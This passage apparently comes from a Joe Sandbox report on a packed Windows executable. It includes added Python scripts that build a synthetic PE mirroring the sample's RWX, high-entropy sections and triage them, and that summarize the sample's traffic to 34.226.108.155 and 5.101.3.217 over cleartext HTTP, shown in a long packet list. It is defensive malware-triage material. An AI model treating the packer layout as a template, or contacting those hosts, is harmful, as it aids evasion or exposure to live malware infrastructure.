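STANDARD_SECTION_NAMES = {".text", ".data", ".rdata", ".idata", ".edata", ".rsrc", ".reloc",
                          ".bss", ".tls", ".pdata", ".CRT", "CODE", "DATA", "BSS"}


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty or constant input, 8.0 for uniformly distributed bytes."""
    n = len(data)
    return max(0.0, -sum(c / n * math.log2(c / n) for c in Counter(data).values())) if n else 0.0


def build_pe32(sections, entry_rva, image_base=0x400000, file_align=0x200):
    """Assemble a minimal well-formed PE32; sections = [(name, rva, vsize, raw_bytes, chars)]."""
    ceil_to = lambda x, a: -(-x // a) * a
    first_raw = ceil_to(0x40 + 4 + 20 + 224 + 40 * len(sections), file_align)
    raw_ptr, sect_hdrs, raw_blobs = first_raw, b"", b""
    for name, rva, vsize, raw, chars in sections:
        raw = raw.ljust(ceil_to(len(raw), file_align), b"\0")
        sect_hdrs += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"), vsize, rva,
                                 len(raw), raw_ptr, 0, 0, 0, 0, chars)
        raw_blobs, raw_ptr = raw_blobs + raw, raw_ptr + len(raw)
    size_of_image = ceil_to(max(rva + vsize for _, rva, vsize, _, _ in sections), 0x1000)
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)          # e_lfanew: PE signature at 0x40
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 224, 0x0102)
    opt = struct.pack("<HBB" + "I" * 9 + "H" * 6 + "I" * 4 + "HH" + "I" * 6,   # PE32 optional header
                      0x10B, 0, 0, 0, 0, 0, entry_rva, 0x1000, 0, image_base, 0x1000, file_align,
                      4, 0, 0, 0, 4, 0, 0, size_of_image, first_raw, 0, 2, 0x40,
                      0x100000, 0x1000, 0x100000, 0x1000, 0, 16) + b"\0" * 128  # 16 empty data dirs
    return (dos + coff + opt + sect_hdrs).ljust(first_raw, b"\0") + raw_blobs


def triage_sections(pe: bytes) -> dict:
    """Walk the section table and record the traits packers tend to leave behind."""
    pe_off = struct.unpack_from("<I", pe, 0x3C)[0] if pe[:2] == b"MZ" and len(pe) >= 0x40 else -1
    if pe_off < 0 or pe[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    nsect, opt_size = struct.unpack_from("<H", pe, pe_off + 6)[0], struct.unpack_from("<H", pe, pe_off + 20)[0]
    opt = pe_off + 24
    magic, entry_rva = struct.unpack_from("<H", pe, opt)[0], struct.unpack_from("<I", pe, opt + 16)[0]
    # PE32 keeps ImageBase as a DWORD at +28; PE32+ as a QWORD at +24 (it has no BaseOfData).
    image_base = struct.unpack_from("<I", pe, opt + 28)[0] if magic == 0x10B else struct.unpack_from("<Q", pe, opt + 24)[0]
    exec_write, sections = IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_WRITE, []
    for i in range(nsect):
        name, vsize, va, raw_size, raw_ptr, _, _, _, _, chars = struct.unpack_from(
            "<8sIIIIIIHHI", pe, opt + opt_size + 40 * i)
        name = name.rstrip(b"\0").decode("latin-1")
        sections.append({
            "name": name, "va": va, "vsize": vsize, "raw_size": raw_size,
            "entropy": round(shannon_entropy(pe[raw_ptr:raw_ptr + raw_size]), 3),
            "rwx": (chars & exec_write) == exec_write,
            "non_standard_name": name not in STANDARD_SECTION_NAMES,
            "has_entry_point": va <= entry_rva < va + max(vsize, raw_size),
        })
    return {"entry_rva": entry_rva, "entry_va": image_base + entry_rva, "sections": sections}


def summarize(pe: bytes) -> dict:
    """Condense the per-section data into the findings a sandbox signature would raise."""
    r = triage_sections(pe)
    entry = next((s for s in r["sections"] if s["has_entry_point"]), None)
    return {
        "entry_va": r["entry_va"],
        "entry_section": entry["name"] if entry else None,
        "entry_outside_standard_sections": entry is None or entry["non_standard_name"],
        "rwx_sections": [s["name"] or "(unnamed)" for s in r["sections"] if s["rwx"]],
        "high_entropy_sections": [s["name"] for s in r["sections"] if s["entropy"] > 7.0],
    }


def sample_layout():
    """Constructed to mirror this report: names, RVAs, virtual sizes and characteristics are the
    reported ones; contents are synthetic (seeded noise for the two packed sections, zeros
    elsewhere) and raw sizes are shrunk to keep the image small."""
    rng = random.Random(0)
    noise = lambda n: bytes(rng.getrandbits(8) for _ in range(n))
    return [("",         0x001000, 0x6db000, b"\0" * 0x200,  RWX),
            (".rsrc",    0x6dc000, 0x0001ac, b"\0" * 0x200,  RW),
            (".idata",   0x6dd000, 0x001000, b"\0" * 0x200,  RW),
            ("",         0x6de000, 0x397000, b"\0" * 0x200,  RWX),
            ("dmqztadf", 0xa75000, 0x1bc000, noise(0x2000),  RWX),
            ("eghuolxt", 0xc31000, 0x001000, noise(0x400),   RWX),
            (".taggant", 0xc32000, 0x003000, b"\0" * 0x2200, RWX)]


SAMPLE_PE = build_pe32(sample_layout(), entry_rva=0xC32000)

if __name__ == "__main__":
    print(summarize(SAMPLE_PE))   # entry 0x1032000 in .taggant, five RWX sections
```

To run it on a real file, replace SAMPLE_PE with the bytes of the sample; triage_sections reads only the headers and the raw slices they point to, so a truncated file (such as one whose certificate table points past the end) still triages cleanly.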
Name         RVA       Size   Type                                    Language  Country  ZLIB Complexity
RT_MANIFEST  0xc305a0  0x152  ASCII text, with CRLF line terminators                     0.6479289940828402
DLL           Import
kernel32.dll  lstrcpy
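The packet list that follows is one row per TCP segment, which is hard to read as connections. The following script is an added example, not part of the report: it groups such rows into client/server flows, counts packets per direction, measures each flow's duration and labels the server port (80 as cleartext HTTP to a public address, 443 as TLS). The embedded PACKET_ROWS are constructed from eight of the report's rows, in the same field order (timestamp, source port, destination port, source IP, destination IP). It assumes the non-global endpoint (here 192.168.2.7) is the client, and PORT_NOTES is the script's own mapping.

```python
"""Turn a sandbox's per-packet rows into per-connection summaries and flag cleartext HTTP
to public addresses. Added example, not part of the Joe Sandbox report."""
from datetime import datetime
from ipaddress import ip_address

# Constructed input: eight rows taken from this report's packet list, one packet per line,
# fields: timestamp, source port, destination port, source IP, destination IP.
PACKET_ROWS = """\
Dec 27, 2024 15:05:50.997571945 CET 49700 443 192.168.2.7 34.226.108.155
Dec 27, 2024 15:05:50.997617960 CET 443 49700 34.226.108.155 192.168.2.7
Dec 27, 2024 15:05:50.997679949 CET 49700 443 192.168.2.7 34.226.108.155
Dec 27, 2024 15:05:53.227380991 CET 443 49700 34.226.108.155 192.168.2.7
Dec 27, 2024 15:05:55.345576048 CET 49701 80 192.168.2.7 5.101.3.217
Dec 27, 2024 15:05:55.466133118 CET 80 49701 5.101.3.217 192.168.2.7
Dec 27, 2024 15:05:55.466351986 CET 49701 80 192.168.2.7 5.101.3.217
Dec 27, 2024 15:05:56.879656076 CET 80 49701 5.101.3.217 192.168.2.7
"""

# Assumption: what a given server port means for triage.
PORT_NOTES = {80: "cleartext HTTP to a public address", 443: "TLS"}


def parse_row(line: str):
    """Split one row; the nanosecond timestamp is truncated to microseconds for datetime."""
    mon, day, year, clock, _tz, sport, dport, sip, dip = line.split()
    ts = datetime.strptime(f"{mon} {day.rstrip(',')} {year} {clock[:-3]}", "%b %d %Y %H:%M:%S.%f")
    return ts, int(sport), int(dport), ip_address(sip), ip_address(dip)


def summarize_flows(rows: str) -> list:
    """Group packets by (client, client port, server, server port) and count each direction.
    The non-global endpoint is taken as the client, so both directions land in one flow."""
    flows = {}
    for line in rows.strip().splitlines():
        ts, sport, dport, sip, dip = parse_row(line)
        outbound = dip.is_global and not sip.is_global
        client, cport, server, srvport = (sip, sport, dip, dport) if outbound else (dip, dport, sip, sport)
        key = (str(client), cport, str(server), srvport)
        f = flows.setdefault(key, {"client": str(client), "client_port": cport, "server": str(server),
                                   "server_port": srvport, "first": ts, "last": ts, "out": 0, "in": 0})
        f["first"], f["last"] = min(f["first"], ts), max(f["last"], ts)
        f["out" if outbound else "in"] += 1
    for f in flows.values():
        f["duration_s"] = round((f["last"] - f["first"]).total_seconds(), 3)
        f["note"] = PORT_NOTES.get(f["server_port"], "other")
    return sorted(flows.values(), key=lambda f: f["first"])


if __name__ == "__main__":
    for f in summarize_flows(PACKET_ROWS):
        print(f'{f["client"]}:{f["client_port"]} -> {f["server"]}:{f["server_port"]}  '
              f'out={f["out"]} in={f["in"]} duration={f["duration_s"]}s  {f["note"]}')
```

Feeding the full list below through summarize_flows collapses it to the same two conversations: one short TLS exchange with 34.226.108.155 and a longer, mostly inbound transfer from 5.101.3.217 over port 80.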
Timestamp                            Source Port  Dest Port  Source IP       Dest IP
Dec 27, 2024 15:05:50.997571945 CET  49700        443        192.168.2.7     34.226.108.155
Dec 27, 2024 15:05:50.997617960 CET  443          49700      34.226.108.155  192.168.2.7
Dec 27, 2024 15:05:50.997679949 CET  49700        443        192.168.2.7     34.226.108.155
Dec 27, 2024 15:05:51.016897917 CET  49700        443        192.168.2.7     34.226.108.155
Dec 27, 2024 15:05:51.016937971 CET  443          49700      34.226.108.155  192.168.2.7
Dec 27, 2024 15:05:52.866133928 CET  443          49700      34.226.108.155  192.168.2.7
Dec 27, 2024 15:05:52.868810892 CET  49700        443        192.168.2.7     34.226.108.155
Dec 27, 2024 15:05:52.868838072 CET  443          49700      34.226.108.155  192.168.2.7
Dec 27, 2024 15:05:52.870300055 CET  443          49700      34.226.108.155  192.168.2.7
Dec 27, 2024 15:05:52.870351076 CET  49700        443        192.168.2.7     34.226.108.155
Dec 27, 2024 15:05:52.888250113 CET  49700        443        192.168.2.7     34.226.108.155
Dec 27, 2024 15:05:52.888398886 CET  443          49700      34.226.108.155  192.168.2.7
Dec 27, 2024 15:05:52.891978979 CET  49700        443        192.168.2.7     34.226.108.155
Dec 27, 2024 15:05:52.892000914 CET  443          49700      34.226.108.155  192.168.2.7
Dec 27, 2024 15:05:52.946316957 CET  49700        443        192.168.2.7     34.226.108.155
Dec 27, 2024 15:05:53.214333057 CET  443          49700      34.226.108.155  192.168.2.7
Dec 27, 2024 15:05:53.214616060 CET  443          49700      34.226.108.155  192.168.2.7
Dec 27, 2024 15:05:53.214708090 CET  49700        443        192.168.2.7     34.226.108.155
Dec 27, 2024 15:05:53.227350950 CET  49700        443        192.168.2.7     34.226.108.155
Dec 27, 2024 15:05:53.227380991 CET  443          49700      34.226.108.155  192.168.2.7
Dec 27, 2024 15:05:55.345576048 CET  49701        80         192.168.2.7     5.101.3.217
Dec 27, 2024 15:05:55.466133118 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:55.466351986 CET  49701        80         192.168.2.7     5.101.3.217
Dec 27, 2024 15:05:55.667896986 CET  49701        80         192.168.2.7     5.101.3.217
Dec 27, 2024 15:05:55.787566900 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:55.787584066 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:55.787642002 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:55.787642002 CET  49701        80         192.168.2.7     5.101.3.217
Dec 27, 2024 15:05:55.787651062 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:55.787709951 CET  49701        80         192.168.2.7     5.101.3.217
Dec 27, 2024 15:05:55.787713051 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:55.787730932 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:55.787775993 CET  49701        80         192.168.2.7     5.101.3.217
Dec 27, 2024 15:05:55.787786961 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:55.787796974 CET  49701        80         192.168.2.7     5.101.3.217
Dec 27, 2024 15:05:55.787808895 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:55.787820101 CET  49701        80         192.168.2.7     5.101.3.217
Dec 27, 2024 15:05:55.787846088 CET  49701        80         192.168.2.7     5.101.3.217
Dec 27, 2024 15:05:55.787925959 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:55.787935019 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:55.787957907 CET  49701        80         192.168.2.7     5.101.3.217
Dec 27, 2024 15:05:55.787980080 CET  49701        80         192.168.2.7     5.101.3.217
Dec 27, 2024 15:05:55.907320976 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:55.907339096 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:55.907370090 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:55.907380104 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:55.907398939 CET  49701        80         192.168.2.7     5.101.3.217
Dec 27, 2024 15:05:55.907474041 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:55.907483101 CET  49701        80         192.168.2.7     5.101.3.217
Dec 27, 2024 15:05:55.907511950 CET  49701        80         192.168.2.7     5.101.3.217
Dec 27, 2024 15:05:55.907686949 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:55.907747984 CET  49701        80         192.168.2.7     5.101.3.217
Dec 27, 2024 15:05:55.950527906 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:55.950658083 CET  49701        80         192.168.2.7     5.101.3.217
Dec 27, 2024 15:05:56.070311069 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.070413113 CET  49701        80         192.168.2.7     5.101.3.217
Dec 27, 2024 15:05:56.110686064 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.110760927 CET  49701        80         192.168.2.7     5.101.3.217
Dec 27, 2024 15:05:56.230446100 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.230556011 CET  49701        80         192.168.2.7     5.101.3.217
Dec 27, 2024 15:05:56.391844034 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.391956091 CET  49701        80         192.168.2.7     5.101.3.217
Dec 27, 2024 15:05:56.517741919 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.518284082 CET  49701        80         192.168.2.7     5.101.3.217
Dec 27, 2024 15:05:56.518515110 CET  49701        80         192.168.2.7     5.101.3.217
Dec 27, 2024 15:05:56.639525890 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.639616013 CET  49701        80         192.168.2.7     5.101.3.217
Dec 27, 2024 15:05:56.639651060 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.639661074 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.639669895 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.639678955 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.639763117 CET  49701        80         192.168.2.7     5.101.3.217
Dec 27, 2024 15:05:56.639810085 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.639818907 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.639899969 CET  49701        80         192.168.2.7     5.101.3.217
Dec 27, 2024 15:05:56.639950991 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.639960051 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.639993906 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.640021086 CET  49701        80         192.168.2.7     5.101.3.217
Dec 27, 2024 15:05:56.640069008 CET  49701        80         192.168.2.7     5.101.3.217
Dec 27, 2024 15:05:56.640185118 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.640194893 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.640249014 CET  49701        80         192.168.2.7     5.101.3.217
Dec 27, 2024 15:05:56.640316963 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.640326977 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.640335083 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.640343904 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.640388012 CET  49701        80         192.168.2.7     5.101.3.217
Dec 27, 2024 15:05:56.640429020 CET  49701        80         192.168.2.7     5.101.3.217
Dec 27, 2024 15:05:56.640474081 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.640484095 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.640619040 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.640629053 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.640636921 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.640786886 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.640935898 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.640944958 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.641086102 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.641094923 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.641103029 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.641248941 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.641258001 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.641266108 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.641319036 CET  49701        80         192.168.2.7     5.101.3.217
Dec 27, 2024 15:05:56.641410112 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.641418934 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.641484022 CET  49701        80         192.168.2.7     5.101.3.217
Dec 27, 2024 15:05:56.682466984 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.682683945 CET  49701        80         192.168.2.7     5.101.3.217
Dec 27, 2024 15:05:56.759305954 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.759434938 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.759476900 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.759545088 CET  49701        80         192.168.2.7     5.101.3.217
Dec 27, 2024 15:05:56.759558916 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.759699106 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.759783983 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.759875059 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.759955883 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.760088921 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.760097980 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.760186911 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.760271072 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.760348082 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.760355949 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.760433912 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.760467052 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.760543108 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.760565042 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.760888100 CET  49701        80         192.168.2.7     5.101.3.217
Dec 27, 2024 15:05:56.760994911 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.761010885 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.761063099 CET  49701        80         192.168.2.7     5.101.3.217
Dec 27, 2024 15:05:56.761107922 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.761123896 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.761176109 CET  49701        80         192.168.2.7     5.101.3.217
Dec 27, 2024 15:05:56.761353970 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.761363029 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.761435986 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.761440039 CET  49701        80         192.168.2.7     5.101.3.217
Dec 27, 2024 15:05:56.761492014 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.761542082 CET  49701        80         192.168.2.7     5.101.3.217
Dec 27, 2024 15:05:56.761579037 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.761590004 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.761642933 CET  49701        80         192.168.2.7     5.101.3.217
Dec 27, 2024 15:05:56.761683941 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.761699915 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.761746883 CET  49701        80         192.168.2.7     5.101.3.217
Dec 27, 2024 15:05:56.761778116 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.761786938 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.761876106 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.761914015 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.761970997 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.762015104 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.762109041 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.762118101 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.762214899 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.762223959 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.762269974 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.762377024 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.762386084 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.762476921 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.762485981 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.762494087 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.762568951 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.762579918 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.762710094 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.762721062 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.762814999 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.762825012 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.762907028 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.762917995 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.762995958 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.763041019 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.763086081 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.763097048 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.763184071 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.763221979 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.763309002 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.763324976 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.763396025 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.763413906 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.802305937 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.879192114 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.879354954 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.879488945 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.879497051 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.879533052 CET  80           49701      5.101.3.217     192.168.2.7
Dec 27, 2024 15:05:56.879656076 CET  80           49701      5.101.3.217     192.168.2.7
                                                            Dec 27, 2024 15:05:56.879666090 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.880326986 CET4970180192.168.2.75.101.3.217
                                                            Dec 27, 2024 15:05:56.880460978 CET4970180192.168.2.75.101.3.217
                                                            Dec 27, 2024 15:05:56.880506039 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.880516052 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.880551100 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.880584002 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.880739927 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.880748987 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.880861998 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.880872011 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.881150961 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.881175995 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.881364107 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.881434917 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.881565094 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.881581068 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.881630898 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.881680965 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.881736994 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.881783009 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.881875038 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.881973982 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.881983995 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.882002115 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.882133007 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.882142067 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.882181883 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.882260084 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.882380009 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.882391930 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.882477045 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.882486105 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.882563114 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.882579088 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.882750034 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.882759094 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.882811069 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.882818937 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.882962942 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.882972002 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.882982016 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.883002043 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.883122921 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.883238077 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.883246899 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.883255959 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.883265018 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.883275032 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.883388996 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.883398056 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.883435011 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.883444071 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.883505106 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.883513927 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.883578062 CET80497015.101.3.217192.168.2.7
                                                            Dec 27, 2024 15:05:56.883594036 CET80497015.101.3.217192.168.2.7
